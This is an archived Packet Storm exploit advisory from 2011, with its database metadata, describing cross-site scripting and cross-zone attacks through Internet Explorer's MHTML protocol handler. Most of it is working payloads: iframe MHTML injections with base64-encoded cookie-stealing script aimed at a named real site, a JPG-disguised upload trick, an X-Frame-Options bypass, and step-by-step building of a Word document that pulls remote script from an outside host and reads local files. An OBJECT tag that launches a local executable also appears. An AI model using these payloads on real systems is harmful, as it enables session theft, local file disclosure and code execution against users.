Microsoft Internet Explorer MHTML Cross Site Scripting
2011-01-28T00:00:00
ID PACKETSTORM:97980 Type packetstorm Reporter 80vul Modified 2011-01-28T00:00:00
Description
`Hacking with mhtml protocol handler
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15
References: http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt
Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) Was finally released yesterday, There are two articles about the browser security[0x05 and 0x06].If the combination of both, we can complete a lot of interesting attacks...
1.Cross Site Scripting by upload mhtml file
Using the mhtml protocol handler,The file extension is ignored.so the attacker use renname the mhtml file to a *.jpg file,etc. then upload it to the target site...
ofcouser ,we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload file format security restrictions
then use iframe tag src to it:
<iframe src="MHTML:http://target-site.com/upfile/demo.html!cookie"></iframe>
2.Cross Site Scripting mhtml-file string injection
the mhtml-file format is only base on CRLF,so if we can injection CRLF, the site may be attacked.
poc:
test it on win7 system pls.
<iframe src="mhtml:http://www.tudou.com/my/channel/item.srv?icode=enQCgQKJTDs&callback=Content-Type%3A%20multipart%2Frelated%3B%20boundary%3D_boundary_by_mere%0D%0A%0D%0A--_boundary_by_mere%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APGJvZHk%2BDQo8aWZyYW1lIGlkPWlmciBzcmM9Imh0dHA6Ly93d3cuODB2dWwuY29tLyI%2BPC9pZnJhbWU%2BDQo8c2NyaXB0Pg0KYWxlcnQoZG9jdW1lbnQuY29va2llKTsNCmZ1bmN0aW9uIGNyb3NzY29va2llKCl7DQppZnIgPSBpZnIuY29udGVudFdpbmRvdyA%2FIGlmci5jb250ZW50V2luZG93IDogaWZyLmNvbnRlbnREb2N1bWVudDsNCmFsZXJ0KGlmci5kb2N1bWVudC5jb29raWUpDQp9DQpzZXRUaW1lb3V0KCJjcm9zc2Nvb2tpZSgpIiwxMDAwKTsNCjwvc2NyaXB0PjwvYm9keT4NCg%3D%3D%0D%0A--_boundary_by_mere--%0D%0A!cookie"></iframe>
if win-xp or win2k3 system,pls do it by the second urlencode.
mhtml-file string injection in JOSN file, some sites restrict the JOSN file's Content-Type to defense xss. maybe we can use mhtml-file string injection to pass it :)
3.bypass X-Frame-Options
X-Frame-Options did not protect the mhtml protocol handler.
the demo:
<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie"></iframe>
<iframe src="http://www.80vul.com/mhtml/zz.php"></iframe>
4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul
Billy (BK) Rios introduced a very interesting approach to Steal local files on the RuxCon/Baythreat(https://xs-sniper.com/blog/2010/12/17/will-it-blend/) ,it used "Script src to local files in the LocalLow directory" by file:// +java apple +Adobe Reader+Adobe flash to complete it. but if used mhtml+file://uncpath, so easy to do it.
Demo:
test it on win2k3+ie8+Adobe Reader 9
http://www.80vul.com/hackgame/xs-g0.php?username=Administrator
5.mhtml+file://uncpath+word == local xss vul
demo:http://www.80vul.com/mhtml/word.doc
download it, and save it on c:\word.doc and open it. u can get the alert c:\boot.ini 's content.
this is base on "Microsoft word javascript execution"(http://marc.info/?l=bugtraq&m=121121432823704&w=2).
to make the proof of concept follow the following steps:
1-Make a html file and paste xss code
2-Open the html file with the word and save as c:\word.xml
3-Open the word.xml with the notepad,and inject the mhtml code in <w:t>aaaaa </w:t>
4-Rename c:\word.xml to c:\word.doc
5-Open c:\word.doc file
xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=http://www.80vul.com/hackgame/word.htm></OBJECT>
aaaaa
----------------------------------------------------------
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere--
*/
--------------------------------------------------------
if u use this vul to attack someone,u need to known the word file path where save the download file. and lots of guns used on the desktop :)
"Microsoft word javascript execution" is only work on office 2k3 and 2k7, In other versions u can make the link, and src to http://www.80vul.com/hackgame/word.htm
update
ofcouse ,this way maybe work on anoher file type like:*.pdf by app.launchURL()
6. Coss Zone Scripting
First we would like to mention a very old vulnerability:
<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-111111111111 CODEBASE=c:/winnt/system32/calc.exe></OBJECT>
This vulnerability (by firebug9[http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html]) allows you to execute any program on "My Computer" zone,Been tested and found to this vul work on ie6/ie7/ie8+win2k/winxp/win2k3
Then repeat "5.mhtml+file://uncpath+word == local xss vul" steps and change:
xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=mhtml:file://c:/word.doc!cookie></OBJECT>
aaaaa
----------------------------------------------------------
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere--
*/
--------------------------------------------------------
thx d4rkwind(http://hi.baidu.com/d4rkwind/) for his excellent paper.
About Ph4nt0m Webzine
Ph4nt0m Webzine is a free network Security Magazine,We accept articles in English and Chinese, you are welcome contributions .
mailto:root_at_ph4nt0m.org pls.thank you!
`
{"reporter": "80vul", "enchantments": {"score": {"vector": "NONE", "value": 7.2}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:46"}, "vulnersScore": 7.2}, "published": "2011-01-28T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:26:46", "history": [], "id": "PACKETSTORM:97980", "sourceHref": "https://packetstormsecurity.com/files/download/97980/msiemhtml-xss.txt", "objectVersion": "1.2", "sourceData": "`Hacking with mhtml protocol handler \n \nAuthor: www.80vul.com [Email:5up3rh3i#gmail.com] \nRelease Date: 2011/1/15 \nReferences: http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt \n \nPh4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) Was finally released yesterday, There are two articles about the browser security[0x05 and 0x06].If the combination of both, we can complete a lot of interesting attacks... \n \n1.Cross Site Scripting by upload mhtml file \n \nUsing the mhtml protocol handler,The file extension is ignored.so the attacker use renname the mhtml file to a *.jpg file,etc. then upload it to the target site... \n \nofcouser ,we can use \"copy /b 1.jpg + 1.mhtml 2.jpg\" to bypass some upload file format security restrictions \n \nthen use iframe tag src to it: \n \n<iframe src=\"MHTML:http://target-site.com/upfile/demo.html!cookie\"></iframe> \n \n2.Cross Site Scripting mhtml-file string injection \n \nthe mhtml-file format is only base on CRLF,so if we can injection CRLF, the site may be attacked. \n \npoc: \n \ntest it on win7 system pls. \n \n<iframe src=\"mhtml:http://www.tudou.com/my/channel/item.srv?icode=enQCgQKJTDs&callback=Content-Type%3A%20multipart%2Frelated%3B%20boundary%3D_boundary_by_mere%0D%0A%0D%0A--_boundary_by_mere%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APGJvZHk%2BDQo8aWZyYW1lIGlkPWlmciBzcmM9Imh0dHA6Ly93d3cuODB2dWwuY29tLyI%2BPC9pZnJhbWU%2BDQo8c2NyaXB0Pg0KYWxlcnQoZG9jdW1lbnQuY29va2llKTsNCmZ1bmN0aW9uIGNyb3NzY29va2llKCl7DQppZnIgPSBpZnIuY29udGVudFdpbmRvdyA%2FIGlmci5jb250ZW50V2luZG93IDogaWZyLmNvbnRlbnREb2N1bWVudDsNCmFsZXJ0KGlmci5kb2N1bWVudC5jb29raWUpDQp9DQpzZXRUaW1lb3V0KCJjcm9zc2Nvb2tpZSgpIiwxMDAwKTsNCjwvc2NyaXB0PjwvYm9keT4NCg%3D%3D%0D%0A--_boundary_by_mere--%0D%0A!cookie\"></iframe> \n \nif win-xp or win2k3 system,pls do it by the second urlencode. \n \nmhtml-file string injection in JOSN file, some sites restrict the JOSN file's Content-Type to defense xss. maybe we can use mhtml-file string injection to pass it :) \n \n3.bypass X-Frame-Options \n \nX-Frame-Options did not protect the mhtml protocol handler. \n \nthe demo: \n \n<iframe src=\"mhtml:http://www.80vul.com/mhtml/zz.php!cookie\"></iframe> \n<iframe src=\"http://www.80vul.com/mhtml/zz.php\"></iframe> \n \n4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul \n \nBilly (BK) Rios introduced a very interesting approach to Steal local files on the RuxCon/Baythreat(https://xs-sniper.com/blog/2010/12/17/will-it-blend/) ,it used \"Script src to local files in the LocalLow directory\" by file:// +java apple +Adobe Reader+Adobe flash to complete it. but if used mhtml+file://uncpath, so easy to do it. \n \nDemo: \n \ntest it on win2k3+ie8+Adobe Reader 9 \n \nhttp://www.80vul.com/hackgame/xs-g0.php?username=Administrator \n \n \n5.mhtml+file://uncpath+word == local xss vul \n \ndemo:http://www.80vul.com/mhtml/word.doc \n \ndownload it, and save it on c:\\word.doc and open it. u can get the alert c:\\boot.ini 's content. \n \nthis is base on \"Microsoft word javascript execution\"(http://marc.info/?l=bugtraq&m=121121432823704&w=2). \n \nto make the proof of concept follow the following steps: \n \n1-Make a html file and paste xss code \n2-Open the html file with the word and save as c:\\word.xml \n3-Open the word.xml with the notepad,and inject the mhtml code in <w:t>aaaaa </w:t> \n4-Rename c:\\word.xml to c:\\word.doc \n5-Open c:\\word.doc file \n \nxss code \n--------------------------------------------------------- \n<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=http://www.80vul.com/hackgame/word.htm></OBJECT> \naaaaa \n---------------------------------------------------------- \n \nmhtml code \n-------------------------------------------------------- \n/* \nContent-Type: multipart/related; boundary=\"_boundary_by_mere\": \n \n--_boundary_by_mere \nContent-Location:cookie \nContent-Transfer-Encoding:base64 \n \nPGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K \n--_boundary_by_mere-- \n \n*/ \n-------------------------------------------------------- \n \nif u use this vul to attack someone,u need to known the word file path where save the download file. and lots of guns used on the desktop :) \n \n\"Microsoft word javascript execution\" is only work on office 2k3 and 2k7, In other versions u can make the link, and src to http://www.80vul.com/hackgame/word.htm \n \nupdate \nofcouse ,this way maybe work on anoher file type like:*.pdf by app.launchURL() \n \n \n6. Coss Zone Scripting \n \nFirst we would like to mention a very old vulnerability: \n \n<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-111111111111 CODEBASE=c:/winnt/system32/calc.exe></OBJECT> \n \nThis vulnerability (by firebug9[http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html]) allows you to execute any program on \"My Computer\" zone,Been tested and found to this vul work on ie6/ie7/ie8+win2k/winxp/win2k3 \n \nThen repeat \"5.mhtml+file://uncpath+word == local xss vul\" steps and change: \n \nxss code \n--------------------------------------------------------- \n<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=mhtml:file://c:/word.doc!cookie></OBJECT> \naaaaa \n---------------------------------------------------------- \n \nmhtml code \n-------------------------------------------------------- \n/* \nContent-Type: multipart/related; boundary=\"_boundary_by_mere\": \n \n--_boundary_by_mere \nContent-Location:cookie \nContent-Transfer-Encoding:base64 \n \nPE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg== \n--_boundary_by_mere-- \n \n*/ \n-------------------------------------------------------- \n \n \nthx d4rkwind(http://hi.baidu.com/d4rkwind/) for his excellent paper. \n \n \nAbout Ph4nt0m Webzine \n \nPh4nt0m Webzine is a free network Security Magazine,We accept articles in English and Chinese, you are welcome contributions . \nmailto:root_at_ph4nt0m.org pls.thank you! \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "Microsoft Internet Explorer MHTML Cross Site Scripting", "type": "packetstorm", "modified": "2011-01-28T00:00:00", "hash": "5214f805a344aa75da43f6b1ec9415cc845aacf765a98b5b7e27873bb8607417", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "3c0cdc73e42def0771166974a3090e3b", "key": "href"}, {"hash": "5ed3f2945ce7f4b7684c44f50af26376", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "5ed3f2945ce7f4b7684c44f50af26376", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d0bda2f624d50899034191f668ac86df", "key": "reporter"}, {"hash": "fcbc98ca685ea3f92128e5e8874a1994", "key": "sourceData"}, {"hash": "420a441e6ea56878acb1c280fdae8e82", "key": "sourceHref"}, {"hash": "37626fe1e57691c62402b3116b62fc58", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/97980/Microsoft-Internet-Explorer-MHTML-Cross-Site-Scripting.html", "viewCount": 0}